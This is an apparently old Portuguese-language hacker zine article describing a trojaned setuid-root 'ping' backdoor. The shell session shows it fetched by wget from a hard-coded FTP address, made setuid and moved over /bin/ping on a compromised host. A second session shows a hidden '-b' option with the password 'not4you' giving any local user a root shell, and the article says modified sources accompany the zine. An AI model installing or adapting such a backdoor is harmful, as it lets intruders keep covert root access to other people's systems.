PING backd00r
well... vc ja' viu um daqueles sistemas que estao tao mechidos, baguncados
e desatualizados que parece que o sysadmin entrou em coma e nao tem ninguem
pra tomar o lugar dele ? Tipo aqueles com sendmail 8.8.2, kernel 2.0.33 etc.
pois e'... agora, todos conhecem aquele programinha "ping" que a gente usa
pra ver se um host existe etc. pois e', acontece que ele e' por padrao
suidroot :-) bem, num sistema desses e' bem capaz que o buffer overflow pro
ping antigo funcione, mas me refiro aqui a uma backdoor, que depois que vc
pegar root no lugar vc instala ele no lugar do ping (pacote netkit-base) e
pronto. Vamos exemplificar:

alvo.com.br:

bash-2.03# wget -q ftp://200.241.235.26/ping

bash-2.03# chmod +xs ping
bash-2.03# mv ping /bin/ping
bash-2.03# ping
usage: ping [-LRdfnqrv] [-c count] [-i wait] [-l preload]
[-p pattern] [-s packetsize] [-t ttl] [-I interface address] host
bash-2.03# exit

E pronto. O ping backdoor ja' esta' instalado.

Para utilizar:

alvo:~$ ping
usage: ping [-LRdfnqrv] [-c count] [-i wait] [-l preload]
[-p pattern] [-s packetsize] [-t ttl] [-I interface address] host
alvo:~$ ping -b

Enter option:not4you

Argument: bash
bash-2.03#

E pronto. Os fontes modificados do ping acompanham este zine (pingback.tar.gz)
Pra quem nao percebeu, esse not4you e' uma senha definida no ping.c
que pode ser alterada. O Ping backdoor nao executara os parametros do comando
dado, logo, execute somente o nome do programa como /bin/bash, ou se nao
desejar rodar a shell, crie um script com as coisas que devem ser executadas
e faca o ping backdoor executa'-lo.


Talvez issue que vem tem mais backd00r pro povo...
Hosted by www.Geocities.ws

Copyright © Cyber Nine/Crack's S.A todos direitos reservados
Hosted by www.Geocities.ws

Hosted by www.Geocities.ws

Hosted by www.Geocities.ws

Hosted by www.Geocities.ws

1